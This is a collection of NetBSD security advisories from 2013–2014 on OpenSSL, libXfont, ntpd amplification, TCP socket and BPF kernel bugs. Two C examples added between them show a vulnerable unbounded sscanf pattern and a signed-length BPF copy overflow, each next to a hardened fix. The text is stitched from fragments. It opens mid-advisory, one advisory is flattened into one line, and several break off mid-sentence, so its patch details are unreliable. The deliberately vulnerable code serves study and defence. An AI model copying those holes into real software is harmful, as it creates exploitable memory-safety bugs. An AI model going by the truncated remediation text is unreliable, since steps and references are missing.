The following instructions briefly summarise how to upgrade your
kernel. In these instructions, replace:

  ARCH     with your architecture (from uname -m),
  KERNCONF with the name of your kernel configuration file and
  VERSION  with the file version below

File versions containing the fixes:

FILE                                            HEAD   netbsd-6    netbsd-6-1   netbsd-6-0   netbsd-5    netbsd-5-2   netbsd-5-1
----                                            ----   --------    ----------   ----------   --------    ----------   ----------
src/sys/compat/freebsd/freebsd_sched.c          1.20   1.19.40.1   1.19.56.1    1.19.46.1    1.19.10.1   1.19.48.1    1.19.24.1
src/sys/compat/netbsd32/netbsd32_compat_50.c    1.24   1.20.6.1    1.20.14.1    1.20.12.1    XX          XX
src/sys/compat/netbsd32/netbsd32_event.c        1.11   1.9.10.2    1.9.24.1     1.9.16.1     XX          XX
src/sys/compat/osf1/osf1_file.c                 1.42   %           %            %            XX          XX
src/sys/compat/linux/common/linux_exec_elf32.c  1.91   1.86.2.1    1.86.16.1    1.86.8.1     1.81.10.1   1.81.20.1    1.81.16.1

To update from CVS, re-build, and re-install the kernel:

        # cd src
        # cvs update -d -P -r VERSION sys/compat/freebsd/freebsd_sched.c
        # cvs update -d -P -r VERSION
NetBSD Security Advisory 2014-006: Multiple OpenSSL vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 NetBSD Security Advisory 2014-006 = Topic: Multiple OpenSSL vulnerabilities Version:NetBSD-current: June 5th, 2014 NetBSD 6.1 - 6.1.4: affected NetBSD 6.0 - 6.0.5: affected NetBSD 5.1 - 5.1.4: affected NetBSD 5.2 - 5.2.2: affected Severity: MitM, Remote Code Execution, Remote DoS Fixed: NetBSD-current: June 5th, 2014 NetBSD-6-0 branch: June 6th, 2014 NetBSD-6-1 branch: June 6th, 2014 NetBSD-6 branch:June 6th, 2014 NetBSD-5-2 branch: June 6th, 2014 NetBSD-5-1 branch: June 6th, 2014 NetBSD-5 branch:June 6th, 2014 Teeny versions released later than the fix date will contain the fix. Please note that NetBSD releases prior to 5.1 are no longer supported. It is recommended that all users upgrade to a supported release. Abstract SSL/TLS MITM vulnerability (CVE-2014-0224) DTLS recursion flaw (CVE-2014-0221) DTLS invalid fragment vulnerability (CVE-2014-0195) Anonymous ECDH denial of service (CVE-2014-3470) only in NetBSD-6 and NetBSD-current: SSL_MODE_RELEASE_BUFFERS NULL pointer dereference (CVE-2014-0198) SSL_MODE_RELEASE_BUFFERS session injection or denial of service (CVE-2010-5298) only in NetBSD-5 (previously fixed in NetBSD-6 and NetBSD-current): Recovering OpenSSL ECDSA Nonces Using the FLUSH+RELOAD Cache Side-channel Attack (CVE-2014-0076) Technical Details = See http://www.openssl.org/news/secadv_20140605.txt Solutions and Workarounds = Update the OpenSSL libraries and make sure the old libssl and libcrypto are no longer used. - From source: - Update src and rebuild and install. Note: OpenSSL in NetBSD-6 and NetBSD-current has been updated to version 1.0.1h; updating the entire src tree is recommended. - From tarballs: - -- The NetBSD build cluster is currently undergoing hardware maintenance; it may be a while before builds run again. 
  To obtain fixed binaries, fetch the appropriate base.tgz and comp.tgz
  from a daily build later than the fix dates, from
  http://nyftp.netbsd.org/pub/NetBSD-daily/rel/date/arch/binary/sets/
  with a date 20140607* or larger, and your release version and
  architecture (e.g.
  http://nyftp.netbsd.org/pub/NetBSD-daily/netbsd-6-1/201406070100Z/amd64/binary/sets/),
  and then extract the files:

  Shared libraries:

      tar xzpf base.tgz \*libssl\* \*libcrypto\*

  And static libraries and linker config files:

      tar xzpf comp.tgz \*libssl\* \*libcrypto\*

Get the fixed library into use
------------------------------

Since the vulnerability is in a shared library, getting the old library
purged and the fixed one into use requires restarting all programs that
load libssl and libcrypto. The easiest way to do this is to reboot the
system.

Another method: using /bin/sh,

    ps ax -o pid | (while read pid; do \
        pmap $pid | egrep '(libssl|libcrypto)' > /dev/null && echo found $pid ;\
    done)

will find non-chrooted programs that have the affected libraries open;
restart them. sshd will not show up in this list since it runs chrooted
and re-exec'ed, but it also needs to be restarted. ldd programname will
show the shared libraries a program is wont to use.
Lastly, remove the vulnerable library to make sure it won't get used
accidentally:

    rm /usr/lib/libssl.so.10.0

Fixed versions
--------------

files relative to src/crypto/external/bsd/openssl/dist/ssl

branch      d1_both.c        s3_clnt.c     s3_pkt.c      s3_srvr.c      ssl3.h
------      ---------        ---------     --------      ---------      ------
netbsd-6-0  1.1.1.4.4.1.4.2  1.4.4.1.4.2   1.9.4.1.4.2   1.10.2.1.4.2   1.2.2.1.4.2
netbsd-6-1  1.1.1.4.4.1.6.2  1.4.4.1.6.2   1.9.4.1.6.2   1.10.2.1.6.2   1.2.2.1.6.2
netbsd-6    1.1.1.4.4.3      1.4.4.3       1.9.4.3       1.10.2.3       1.2.2.3
HEAD        1.1.1.8          1.9           1.16          1.16           1.6

files relative to crypto/dist/openssl/ssl

branch      d1_both.c     s3_clnt.c      s3_pkt.c      s3_srvr.c      ssl3.h
------      ---------     ---------      --------      ---------      ------
netbsd-5-1  1.3.4.2.2.1   1.12.4.2.2.2   1.9.4.3.2.1   1.15.4.3.2.2   1.8.12.1
netbsd-5-2  1.3.4.2.6.1   1.12.4.3.4.1   1.9.4.3.6.1   1.15.4.4.4.1   1.8.2.1
netbsd-5    1.3.4.3       1.12.4.4       1.9.4.4       1.15.4.5       1.8.4.1

files relative to crypto/dist/openssl/crypto

branch      bn/bn.h     bn/bn_lib.c   ec/ec2_mult.c
------      -------     -----------   -------------
netbsd-5-1  1.12.12.1   1.7.12.1      1.1.1.2.12.1
netbsd-5-2  1.12.2.1    1.7.2.1       1.1.1.2.2.1
netbsd-5    1.12.4.1    1.7.4.1       1.1.1.2.4.1

Thanks To
=========

The OpenSSL team acknowledges:

  KIKUCHI Masashi (Lepidum Co. Ltd.) for CVE-2014-0224
  Imre Rad (Search-Lab Ltd.) for CVE-2014-0221
  Jüri Aedla for
NetBSD Security Advisory 2014-001: Stack buffer overflow in libXfont
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

                 NetBSD Security Advisory 2014-001
                 =================================

Topic:      Stack buffer overflow in libXfont

Version:    NetBSD-current:     source prior to Tue 7th, 2014
            NetBSD 6.1:         affected
            NetBSD 6.0 - 6.0.2: affected
            NetBSD 5.1 - 5.1.2: affected
            NetBSD 5.2:         affected

Severity:   privilege escalation

Fixed:      NetBSD-current:     Tue 7th, 2014
            NetBSD-6-0 branch:  Tue 7th, 2014
            NetBSD-6-1 branch:  Tue 7th, 2014
            NetBSD-6 branch:    Tue 7th, 2014
            NetBSD-5-2 branch:  Tue 7th, 2014
            NetBSD-5-1 branch:  Tue 7th, 2014
            NetBSD-5 branch:    Tue 7th, 2014

Teeny versions released later than the fix date will contain the fix.

Please note that NetBSD releases prior to 5.1 are no longer supported.
It is recommended that all users upgrade to a supported release.

Abstract
========

A stack buffer overflow in parsing of BDF font files in libXfont was
found that can easily be used to crash X programs using libXfont, and
likely could be exploited to run code with the privileges of the X
program (most notably, the X server, commonly running as root).

This vulnerability has been assigned CVE-2013-6462.

Technical Details
=================

From the X.org advisory:

  Scanning of the libXfont sources with the cppcheck static analyzer
  included a report of:

    [lib/libXfont/src/bitmap/bdfread.c:341]: (warning)
      scanf without field width limits can crash with huge input data.

  Evaluation of this report by X.Org developers concluded that a BDF font
  file containing a longer than expected string could overflow the buffer
  on the stack. Testing in X servers built with Stack Protector resulted
  in an immediate crash when reading a user-provided specially crafted
  font.

  As libXfont is used to read user-specified font files in all X servers
  distributed by X.Org, including the Xorg server which is often run with
  root privileges or as setuid-root in order to access hardware, this bug
  may lead to an unprivileged user acquiring root privileges in some
  systems.
  This bug appears to have been introduced in the initial RCS version 1.1
  checked in on 1991/05/10, and is thus believed to be present in every
  X11 release starting with X11R5 up to the current libXfont 1.4.6.
  (Manual inspection shows it is present in the sources from the X11R5
  tarballs, but not in those from the X11R4 tarballs.)

Solutions and Workarounds
=========================

Workaround: restrict access to the X server.

Solutions: a fix is included in the following versions:

xorg: xsrc/external/mit/libXfont/dist/src/bitmap/bdfread.c

    HEAD        1.3
    netbsd-6    1.1.1.2.2.1
    netbsd-6-1  1.1.1.2.6.1
    netbsd-6-0  1.1.1.2.4.1
    netbsd-5    1.1.1.1.2.2
    netbsd-5-2  1.1.1.1.2.1.4.1
    netbsd-5-1  1.1.1.1.2.1.2.1

xfree: xsrc/xfree/xc/lib/font/bitmap/bdfread.c

    HEAD        1.4
    netbsd-6    1.2.8.1
    netbsd-6-1  1.2.14.1
    netbsd-6-0  1.2.10.1
    netbsd-5    1.2.2.1
    netbsd-5-2  1.2.12.1
    netbsd-5-1  1.2.6.1

To obtain fixed binaries, fetch the appropriate xbase.tgz from a daily
build later than the fix dates, i.e.
http://nyftp.netbsd.org/pub/NetBSD-daily/rel/date/arch/binary/sets/xbase.tgz
with a date 20140108* or larger, and your release version and
architecture, and then extract the libXfont shared library files:

for X.org environments, netbsd-6* and HEAD:

    cd /
    tar xzpf /path/to/xbase.tgz ./usr/X11R7/lib/libXfont.so \
        ./usr/X11R7/lib/libXfont.so.3 \
        ./usr/X11R7/lib/libXfont.so.3.0

for X.org environments and netbsd-5*:

    cd /
    tar xzpf /path/to/xbase.tgz ./usr/X11R7/lib/libXfont.so \
        ./usr/X11R7/lib/libXfont.so.2 \
        ./usr/X11R7/lib/libXfont.so.2.0

and for xfree environments:

    cd /
    tar xzpf /path/to/xbase.tgz ./usr/X11R6/lib/libXfont.so \
        ./usr/X11R6/lib/libXfont.so.1 \
        ./usr/X11R6/lib/libXfont.so.1.5

To build from source, update bdfread.c to the appropriate version and
then ./build.sh -x from the top of the src tree.

Thanks To
=========

X.Org thanks the authors of the cppcheck tool for making their static
analyzer available as an open source project we can all benefit from.
  http://cppcheck.sourceforge.net/

NetBSD would like to thank X.org for looking for and fixing this
vulnerability.

Revision History
================

2014-01-07  Initial release

More Information
================

Advisories may be updated as new information becomes available.

The most recent version of this advisory (PGP signed) can be found at
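The bug class the X.Org advisory describes (an unbounded %s conversion into a fixed stack buffer), as an added example that is not libXfont code. The BDF-style "KEYWORD value" line, the BDF_TOKEN_MAX size and the function names are constructed for illustration; the hardened parser gives every conversion a width and rejects over-long tokens instead of silently truncating them:

```c
/* Added example, not libXfont code: bounded parsing of a "KEYWORD value"
 * line of the kind found in BDF fonts.  Sizes and names are constructed. */
#include <stdio.h>
#include <string.h>

/* Constructed limit: the caller's token buffers are this many bytes. */
#define BDF_TOKEN_MAX 64
#define STR_(x) #x
#define STR(x) STR_(x)

enum bdf_status { BDF_OK = 0, BDF_MALFORMED = 1, BDF_TOO_LONG = 2 };

/*
 * Vulnerable pattern (cppcheck's "scanf without field width limits"),
 * shown for comparison only and never called:
 *
 *     char keyword[BDF_TOKEN_MAX], value[BDF_TOKEN_MAX];
 *     sscanf(line, "%s %s", keyword, value);
 *
 * A plain "%s" stops only at whitespace, so a font file carrying a token
 * longer than the buffer writes past its end on the stack.
 */

/*
 * Hardened form.  Each conversion carries a width, and the scratch buffers
 * are one byte larger than the limit: if a scratch token comes back with
 * BDF_TOKEN_MAX characters, the input was at least that long and would not
 * fit (with its NUL) in the caller's BDF_TOKEN_MAX-byte buffer, so the line
 * is rejected instead of being truncated and then parsed as valid.
 * keyword and value must each point to at least BDF_TOKEN_MAX bytes.
 */
enum bdf_status bdf_parse_pair(const char *line, char *keyword, char *value)
{
    char k[BDF_TOKEN_MAX + 1], v[BDF_TOKEN_MAX + 1];

    k[0] = v[0] = '\0';
    /* Expands to "%64s %64s": width = BDF_TOKEN_MAX, buffer = width + 1. */
    if (sscanf(line, "%" STR(BDF_TOKEN_MAX) "s %" STR(BDF_TOKEN_MAX) "s",
               k, v) != 2)
        return BDF_MALFORMED;
    if (strlen(k) >= BDF_TOKEN_MAX || strlen(v) >= BDF_TOKEN_MAX)
        return BDF_TOO_LONG;
    strcpy(keyword, k);   /* both fit: strlen < BDF_TOKEN_MAX */
    strcpy(value, v);
    return BDF_OK;
}

/* Classify a line without keeping the tokens. */
enum bdf_status bdf_classify(const char *line)
{
    char k[BDF_TOKEN_MAX], v[BDF_TOKEN_MAX];
    return bdf_parse_pair(line, k, v);
}

/* Builds a constructed hostile line: "FONT " followed by n non-space bytes.
 * buf must hold at least n + 6 bytes. */
void bdf_make_long_line(char *buf, size_t n)
{
    memcpy(buf, "FONT ", 5);
    memset(buf + 5, 'A', n);
    buf[5 + n] = '\0';
}

int main(void)
{
    char line[256];
    bdf_make_long_line(line, 200);
    printf("STARTFONT 2.1  -> %d\n", bdf_classify("STARTFONT 2.1"));  /* 0 */
    printf("200-byte token -> %d\n", bdf_classify(line));             /* 2 */
    return 0;
}
```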
NetBSD Security Advisory 2014-002: ntpd used as DDoS amplifier
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

                 NetBSD Security Advisory 2014-002
                 =================================

Topic:      ntpd used as DDoS amplifier

Version:    NetBSD-current:     source prior to Dec 27th, 2013
            NetBSD 6.1:         affected
            NetBSD 6.0 - 6.0.2: affected
            NetBSD 5.1 - 5.1.2: affected
            NetBSD 5.2:         affected

Severity:   DDoS participation

Fixed:      NetBSD-current:     Dec 27th, 2013
            NetBSD-6-0 branch:  Jan 6th, 2014
            NetBSD-6-1 branch:  Jan 6th, 2014
            NetBSD-6 branch:    Jan 6th, 2014
            NetBSD-5-2 branch:  Jan 6th, 2014
            NetBSD-5-1 branch:  Jan 6th, 2014
            NetBSD-5 branch:    Jan 6th, 2014

Teeny versions released later than the fix date will contain the fix.

Please note that NetBSD releases prior to 5.1 are no longer supported.
It is recommended that all users upgrade to a supported release.

Abstract
========

An administrative query function is getting used by attackers to use ntp
servers as traffic amplifiers. The new version no longer offers this
query option.

Technical Details
=================

The monlist function, which is available in ntp prior to 4.2.7 to
requestors who are allowed to 'query', yields potentially sizeable
traffic in response to a small query packet, and can thus get used for
amplification attacks.

Solutions and Workarounds
=========================

Workaround: in ntp.conf, setting 'restrict default noquery' will prevent
amplification to random targets (the remaining targets would be those
allowed to query by their own restrict entries). Note that this setting
does not disallow time synchronization, but only querying for the list of
peers and other administrative and informative data. See
/usr/share/doc/html/ntp/accopt.html for information on ntpd access
control configuration options.

Solution: Updating the ntpd binary so it no longer offers the abused
function, as well as updating ntp.conf so it offers less attack surface.
ntpd source: update to

    HEAD        src/external/bsd/ntp/dist/ntpd/ntp_request.c
    netbsd-6    src/external/bsd/ntp/dist/ntpd/ntp_request.c   1.7.2.1
    netbsd-6-1  src/external/bsd/ntp/dist/ntpd/ntp_request.c   1.7.16.1
    netbsd-6-0  src/external/bsd/ntp/dist/ntpd/ntp_request.c   1.7.8.1
    netbsd-5    src/dist/ntp/ntpd/ntp_request.c                 1.8.4.2
    netbsd-5-2  src/dist/ntp/ntpd/ntp_request.c                 1.8.4.1.6.1
    netbsd-5-1  src/dist/ntp/ntpd/ntp_request.c                 1.8.4.1.2.1

default configuration file update:

    HEAD        src/etc/ntp.conf   1.18
    netbsd-6    src/etc/ntp.conf   1.14.2.1
    netbsd-6-1  src/etc/ntp.conf   1.14.16.1
    netbsd-6-0  src/etc/ntp.conf   1.14.8.1
    netbsd-5    src/etc/ntp.conf   1.9.20.1
    netbsd-5-2  src/etc/ntp.conf   1.9.36.1
    netbsd-5-1  src/etc/ntp.conf   1.9.28.1

Thanks To
=========

Thanks to Erik Fair for bringing the issue to our attention and
suggesting a fix.

Revision History
================

2014-01-07  Initial release

More Information
================

Advisories may be updated as new information becomes available.

The most recent version of this advisory (PGP signed) can be found at
  http://ftp.NetBSD.org/pub/NetBSD/security/advisories/NetBSD-SA2014-002.txt.asc

Information about NetBSD and NetBSD security can be found at
  http://www.NetBSD.org/
  http://www.NetBSD.org/Security/

Copyright 2014, The NetBSD Foundation, Inc.  All Rights Reserved.
Redistribution permitted only in full, unmodified form.
$NetBSD: NetBSD-SA2014-002.txt,v 1.2 2014/01/07 21:04:33 tonnerre Exp $
NetBSD Security Advisory 2013-011: embryonic TCP sockets local DoS
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

                 NetBSD Security Advisory 2013-011
                 =================================

Topic:      embryonic TCP sockets local DoS

Version:    NetBSD-current:     source prior to Nov 2nd, 2013
            NetBSD 6.1 - 6.1.2: affected
            NetBSD 6.0 - 6.0.2: affected
            NetBSD 5.1 - 5.1.2: not affected
            NetBSD 5.2:         not affected

Severity:   local DoS

Fixed:      NetBSD-current:     Nov 2nd, 2013
            NetBSD-6-0 branch:  Nov 25th, 2013
            NetBSD-6-1 branch:  Nov 25th, 2013
            NetBSD-6 branch:    Nov 25th, 2013

Teeny versions released later than the fix date will contain the fix.

Please note that NetBSD releases prior to 5.1 are no longer supported.
It is recommended that all users upgrade to a supported release.

Abstract
========

Recently two vulnerabilities in the area of embryonic sockets have been
fixed. Both issues are due to a socket not having credentials set during
a very short timeframe of its creation, and can lead to a user causing a
panic by timing a tcpdrop just right.

Technical Details
=================

The network code adds new connections to the connection table in an
interrupt and references a socket from this table. The socket is also
added to the accept queue of the listening socket. At this point the
socket has no credentials, but tcpdrop can find it in the connection
table and crash the system: for the first issue by looking up its
credentials and hitting an assertion, and in the second version by
referencing a NULL pointer.

Solutions and Workarounds
=========================

Install and reboot to a kernel containing the fixes.

The fastest way to do that, if you are running or can run a standard
kernel built as part of the NetBSD release process, is to obtain the
corresponding kernel from the daily NetBSD autobuild output and install
it on your system. You can obtain such kernels from
http://nyftp.netbsd.org/pub/NetBSD-daily/ where they are sorted by NetBSD
branch, date, and architecture. To fix a system running e.g. NetBSD 6.0
or the stable NetBSD 6.0 branch, the most appropriate kernel will be the
netbsd-6-0 kernel.
To fix a system running NetBSD-current, the HEAD kernel should be used.
In all cases, a kernel from an autobuild dated newer than the fix date
for the branch you are using must be used to fix the problem.

If you cannot use the autobuilt kernels, then for all affected NetBSD
versions, you need to obtain fixed kernel sources, rebuild and install
the new kernel, and reboot the system.

The fixed source may be obtained from the NetBSD CVS repository. The
following instructions briefly summarise how to upgrade your kernel.
In these instructions, replace:
    ARCH        with your architecture (from uname -m),
    KERNCONF    with the name of your kernel configuration file, and
    NEWVERSION  with the CVS version of the fix.

Versions of src/sys/netinet/tcp_usrreq.c:

    Branch      NEWVERSION
    ------      ----------
    HEAD        1.168
    netbsd-6    1.162.2.2
    netbsd-6-1  1.162.2.1.6.1
    netbsd-6-0  1.162.2.1.4.1

Versions of src/sys/kern/uipc_socket.c:

    Branch      NEWVERSION
    ------      ----------
    HEAD        1.220
    netbsd-6    1.209.2.4
    netbsd-6-1  1.209.2.2.2.2
    netbsd-6-0  1.209.2.1.4.2

To update from CVS, re-build, and re-install the kernel:

    # cd src
    # cvs update -rNEWVERSION src/sys/netinet/tcp_usrreq.c
    # cvs update -rNEWVERSION src/sys/kern/uipc_socket.c
    # ./build.sh kernel=KERNCONF
    # mv /netbsd /netbsd.old
    # cp sys/arch/ARCH/compile/obj/KERNCONF/netbsd /netbsd
    # shutdown -r now

For more information on how to do this, see:
    http://www.NetBSD.org/guide/en/chap-kernel.html

Thanks To
=========

Thanks to Brian Marcotte for finding the issues and Christos Zoulas and
Michael van Elst for developing fixes.

Revision History
================

2013-11-27  Initial release

More Information
================

Advisories may be updated as new information becomes available.

The most recent version of this advisory (PGP signed) can be found at
  http://ftp.NetBSD.org/pub/NetBSD/security/advisories/NetBSD-SA2013-011.txt.asc

Information about NetBSD and NetBSD security can be found at
  http://www.NetBSD.org/
  http://www.NetBSD.org/Security/

Copyright 2013, The NetBSD Foundation, Inc.  All Rights Reserved.
Redistribution permitted only in full, unmodified form.

$NetBSD: NetBSD-SA2013-011.txt,v 1.2 2013/11/26 23:59:25 tonnerre Exp $
NetBSD Security Advisory 2013-009: user settable small BPF buffer can cause a panic
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

                 NetBSD Security Advisory 2013-009
                 =================================

Topic:      user settable small BPF buffer can cause a panic

Version:    NetBSD-current:     source prior to Sept 10th, 2013
            NetBSD 6.1:         affected
            NetBSD 6.0:         affected
            NetBSD 5.1:         affected
            NetBSD 5.2:         affected

Severity:   Local DoS

Fixed:      NetBSD-current:     Sept 9th, 2013
            NetBSD-6-0 branch:  Sept 11th, 2013
            NetBSD-6-1 branch:  Sept 11th, 2013
            NetBSD-6 branch:    Sept 11th, 2013
            NetBSD-5-1 branch:  Sept 11th, 2013
            NetBSD-5-2 branch:  Sept 11th, 2013
            NetBSD-5 branch:    Sept 11th, 2013

Please note that NetBSD releases prior to 5.1 are no longer supported.
It is recommended that all users upgrade to a supported release.

Abstract
========

Setting the bpf buffer size manually to be less than the required number
of bytes to store the bpf header will crash the system.

Technical Details
=================

On NetBSD with 64-bit bpf_timeval, the minimum allowed BPF buffer size is
the same size as the size of struct bpf_hdr. When BPF reports a packet,
it will add the link-layer-type header and the bpf_hdr to the buffer it
was supplied, and then add captured data in the remaining bytes.

Setting the buffer size via ioctl BIOCSBLEN checks against
BPF_MINBUFSIZE, but this test is not adequate since it does not include
the size of the link layer header. As the link layer header size can
change, no check there would be adequate.

When calculating the size left for captured data (buffer size minus the
sum of the size of the two headers) it may thus get a negative size. It
will proceed to use this length e.g. to copy data into the buffer, but
the copying routine will use an unsigned variable for the size of the
buffer to copy to, and thus get a very large number. When the copy
routine copies captured data to the buffer, it will leave the bounds of
the buffer, and a panic will result.

Solutions and Workarounds
=========================

Workaround: /dev/bpf* usually can only be read by root.
If you have not changed this default: avoid running bpf programs that try
to use a buffer size smaller than 36 on ethernet and 120 on wifi.

Fix: Install a kernel containing the fix.

The fastest way to do that, if you are running or can run a standard
kernel built as part of the NetBSD release process, is to obtain the
corresponding kernel from the daily NetBSD autobuild output and install
it on your system. You can obtain such kernels from
http://nyftp.netbsd.org/pub/NetBSD-daily/ where they are sorted by NetBSD
branch, date, and architecture. To fix a system running e.g. NetBSD 6.0
or the stable NetBSD 6.0 branch, the most appropriate kernel will be the
netbsd-6-0 kernel. To fix a system running NetBSD-current, the HEAD
kernel should be used. In all cases, a kernel from an autobuild dated
newer than the fix date for the branch you are using must be used to fix
the problem.

If you cannot use the autobuilt kernels, then for all affected NetBSD
versions, you need to obtain fixed kernel sources, rebuild and install
the new kernel, and reboot the system.

The fixed source may be obtained from the NetBSD CVS repository. The
following instructions briefly summarise how to upgrade your kernel.
In these instructions, replace:
    ARCH        with your architecture (from uname -m),
    KERNCONF    with the name of your kernel configuration file, and
    NEWVERSION  with the CVS version of the fix.

Versions of src/sys/net/bpf.c:

    Branch      NEWVERSION
    ------      ----------
    HEAD        1.176
    netbsd-6    1.168.2.1
    netbsd-6-1  1.168.8.1
    netbsd-6-0  1.168.6.1
    netbsd-5    1.141.6.3
    netbsd-5-2  1.141.6.2.2.1
    netbsd-5-1  1.141.6.1.6.1

To update from CVS, re-build, and re-install the kernel:

    # cd src
    # cvs update -rNEWVERSION sys/net/bpf.c
    # ./build.sh kernel=KERNCONF
    # mv /netbsd /netbsd.old
    # cp sys/arch/ARCH/compile/obj/KERNCONF/netbsd /netbsd
    # shutdown -r now

For more information on how to do this, see:
    http://www.NetBSD.org/guide/en/chap-kernel.html

Thanks To
=========

Thanks to Peter Bex, who found and analyzed the problem, and Christos
Zoulas, who created the fix.

Revision History
================

2013-09-11  Initial release

More Information
================

Advisories may be updated as new information becomes available.

The most recent version of this advisory (PGP signed) can be found at
  http://ftp.NetBSD.org/pub/NetBSD/security/advisories/NetBSD-SA2013-009.txt.asc

Information about NetBSD and NetBSD security can be found at
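The length arithmetic the Technical Details of this advisory describe, as an added example that is not NetBSD's bpf.c: the header sizes, the packet lengths and the function names are constructed. The first routine models the signed subtraction whose negative result is consumed as an unsigned copy length; the second places the check at capture time, where the link-layer header size is known, and fails closed rather than computing a length:

```c
/* Added example, not NetBSD kernel code: the length arithmetic behind
 * NetBSD-SA2013-009, with constructed sizes. */
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>

/* Constructed stand-ins; the real values are sizeof(struct bpf_hdr) and the
 * attached interface's link-layer header length, which is not fixed. */
#define BPF_HDR_LEN    24u   /* stands in for sizeof(struct bpf_hdr) */
#define ETHER_HDR_LEN  14u   /* link-layer header of an Ethernet interface */
#define BPF_MINBUFSIZE BPF_HDR_LEN

/* The BIOCSBLEN-time check the advisory calls inadequate: at that point the
 * descriptor's interface (and so its link-layer header size) is unknown, so
 * buffers that only the bpf_hdr fits into are accepted. */
bool biocsblen_accepts(unsigned bufsize)
{
    return bufsize >= BPF_MINBUFSIZE;
}

/* Model of the vulnerable capture path: the room left for captured bytes is
 * computed with signed arithmetic and goes negative when both headers do
 * not fit, and the copy routine then reads that value as an unsigned size.
 * Returns the total number of bytes the copy would write into a buffer of
 * bufsize bytes; anything above bufsize is the out-of-bounds write. */
size_t catch_unchecked(unsigned bufsize, unsigned hdrlen, size_t pktlen)
{
    int room = (int)bufsize - (int)(BPF_HDR_LEN + hdrlen);  /* may be < 0 */
    size_t limit = (size_t)room;              /* e.g. -8 -> SIZE_MAX - 7 */
    size_t caplen = pktlen < limit ? pktlen : limit;
    return BPF_HDR_LEN + hdrlen + caplen;
}

bool catch_unchecked_overflows(unsigned bufsize, unsigned hdrlen, size_t pktlen)
{
    return catch_unchecked(bufsize, hdrlen, pktlen) > bufsize;
}

/* Hardened form: validate at capture time, where hdrlen is known, using
 * unsigned arithmetic and before any subtraction.  Returns the bytes
 * written, or -1 when the buffer cannot hold both headers, in which case
 * the caller drops the packet (or fails the request) instead of copying. */
long catch_checked(unsigned bufsize, unsigned hdrlen, size_t pktlen)
{
    size_t need = (size_t)BPF_HDR_LEN + hdrlen;
    if (bufsize < need)
        return -1;
    size_t room = bufsize - need;             /* never negative: checked */
    size_t caplen = pktlen < room ? pktlen : room;
    return (long)(need + caplen);
}

int main(void)
{
    /* A 30-byte buffer passes the BIOCSBLEN check but cannot hold the two
     * headers on Ethernet; a 1500-byte packet then "fits" in the old path. */
    printf("BIOCSBLEN accepts 30: %d\n", biocsblen_accepts(30));      /* 1 */
    printf("old path writes %zu bytes into 30\n",
           catch_unchecked(30, ETHER_HDR_LEN, 1500));                 /* 1538 */
    printf("checked path: %ld\n", catch_checked(30, ETHER_HDR_LEN, 1500)); /* -1 */
    return 0;
}
```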
NetBSD Security Advisory 2013-007: Protocol handling issues in X Window System client libraries
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

                 NetBSD Security Advisory 2013-007
                 =================================

Topic:      Protocol handling issues in X Window System client libraries

Version:    NetBSD-current:     source prior to Jun 6th, 2013
            NetBSD 6.1:         affected
            NetBSD 6.0:         affected
            NetBSD 5.1:         affected
            NetBSD 5.2:         affected

Severity:   Privilege Escalation

Fixed:      NetBSD-current:     Jun 6th, 2013
            NetBSD-6-0 branch:  Jun 6th, 2013
            NetBSD-6-1 branch:  Jun 6th, 2013
            NetBSD-6 branch:    Jun 6th, 2013
            NetBSD-5-2 branch:  Jun 6th, 2013
            NetBSD-5-1 branch:  Jun 6th, 2013
            NetBSD-5 branch:    Jun 6th, 2013

Please note that NetBSD releases prior to 5.1 are no longer supported.
It is recommended that all users upgrade to a supported release.

Abstract
========

X Window System client libraries were trusting server input to be correct
and non-malicious. In case of a client displaying to a server under
different administration, that trust may be unfounded.

This set of vulnerabilities has been assigned the following CVE ids:

  CVE-2013-1981 CVE-2013-1982 CVE-2013-1983 CVE-2013-1984 CVE-2013-1985
  CVE-2013-2062 CVE-2013-1986 CVE-2013-1987 CVE-2013-1988 CVE-2013-2063
  CVE-2013-1989 CVE-2013-1990 CVE-2013-1991 CVE-2013-1992 CVE-2013-2064
  CVE-2013-1993 CVE-2013-1994 CVE-2013-1995 CVE-2013-1996 CVE-2013-1997
  CVE-2013-1998 CVE-2013-2066 CVE-2013-1999 CVE-2013-2000 CVE-2013-2001
  CVE-2013-2002 CVE-2013-1981 CVE-2013-2003 CVE-2013-2004 CVE-2013-2005

Technical Details
=================

See http://www.x.org/wiki/Development/Security/Advisory-2013-05-23 for
details.

The bugs fall into 6 general areas:

- Integer overflow errors in memory allocation.
- Sign extension errors in memory allocation.
- Buffer overflows due to unvalidated data.
- Integer overflows in parsing user data.
- Infinite recursion in user data.
- Memory corruption due to uninitialised pointer use.

Scenarios for the privilege escalation are an attacker displaying a
setuid (s-bitted) client (e.g. an xlock variant) on a malicious server
under their control, or using e.g.
one of the buffer overflow varieties to execute code as root.

Solutions and Workarounds
=========================

Binary: Install a new xbase set. These can be found pre-compiled at
http://nyftp.netbsd.org/pub/NetBSD-daily/netbsd-branch/datetimeZ/arch/binary/sets/xbase.tgz

From source: For NetBSD-current, update to version 2013-06-06 or newer.
For NetBSD releases, update the following files to at least the version
given:

File Name                                                 netbsd-5-1       netbsd-5-2       netbsd-5     netbsd-6-0   netbsd-6-1   netbsd-6
=========                                                 ==========       ==========       ========     ==========   ==========   ========
xsrc/external/mit/MesaLib/dist/src/glx/x11/XF86dri.c      1.1.1.1.2.1.2.1  1.1.1.1.2.1.4.1  1.1.1.1.2.2  1.1.1.1.4.1  1.1.1.1.6.1  1.1.1.1.2.1
xsrc/external/mit/libFS/dist/src/FSOpenServ.c             1.1.1.1.2.1.2.1  1.1.1.1.2.1.4.1  1.1.1.1.2.2  1.1.1.2.4.1  1.1.1.2.6.1  1.1.1.2.2.1
xsrc/external/mit/libX11/dist/modules/im/ximcp/imLcPrs.c  1.1.1.1.2.1.2.1  1.1.1.1.2.1.4.1  1.1.1.1.2.2  1.1.1.5.4.1  1.1.1.5.6.1  1.1.1.5.2.1
xsrc/external/mit/libX11/dist/modules/im/ximcp/imTrX.c    1.1.1.1.2.1.2.1  1.1.1.1.2.1.4.1  1.1.1.1.2.2  1.1.1.6.4.1  1.1.1.6.6.1  1.1.1.6.2.1
